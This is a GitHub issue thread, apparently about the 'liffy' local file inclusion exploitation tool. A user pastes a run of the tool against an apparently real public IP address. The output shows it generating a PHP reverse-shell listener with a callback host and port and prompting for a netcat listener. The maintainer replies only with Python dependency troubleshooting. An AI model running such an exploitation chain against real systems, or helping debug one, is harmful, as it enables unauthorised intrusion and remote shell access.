Git Product home page Git Product logo

Comments (8)

mzfr avatar mzfr commented on September 25, 2024

what is your python version? Which OS are you running on?

from liffy.

shivamking05675 avatar shivamking05675 commented on September 25, 2024

from liffy.

mzfr avatar mzfr commented on September 25, 2024

I just tried it on my system and I didn't get any errors. But I've still replaced the keyword python to python3 in all the subprocess command executions. 5866f73

Even though this wasn't the cause of the error, just try to pull again and then use it.

Also, try it out with a lower version of python like python3.8 and let me know if it works or not.

from liffy.

shivamking05675 avatar shivamking05675 commented on September 25, 2024

Hello Mzfr sir,

This Time i'm using python 3.5 version and i got a new error.

python3 liffy.py http://206.209.126.5/includes/header.php?systempath= -d -e -i


| | ()/ |/ | | \ / _ \
| | | || |
_ _ __ __ ) || | | |
| | | | | | | | | \ \ / // / | | | |
| |
| | | | | | || | \ V // / | || |
|
||| || _, | _/|()/
/ |
|
/

[] Checking Target: 206.209.126.5
[
] Testing with data://
[?] Host For Callbacks: 192.168.1.54
[?] Port For Callbacks: 3333
[] Generating PHP listener
[+] Success!
[
] listener: /tmp/shell.php
[] Start your listener by running nc -ntlp 3333
[
] Starting Web Server ...
Traceback (most recent call last):
File "/home/king/liffy/core/Server.py", line 12, in
daemon_context = daemon.DaemonContext()
AttributeError: module 'daemon' has no attribute 'DaemonContext'
[?] Press Enter To Continue When Your netcat listener is Running ...

Pelease give me a solution of this error?

from liffy.

shivamking05675 avatar shivamking05675 commented on September 25, 2024

Can you tell me which os you are using and which python version u r using?

from liffy.

mzfr avatar mzfr commented on September 25, 2024

That daemon error is because of the missing python package. Make sure you have installed all the requirements.
I am using Ubuntu 20.04 inside WSL with python 3.8.2

from liffy.

shivamking05675 avatar shivamking05675 commented on September 25, 2024

from liffy.

mzfr avatar mzfr commented on September 25, 2024

Feel free to open it again if you still facing the issue,

from liffy.

Related Issues (15)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.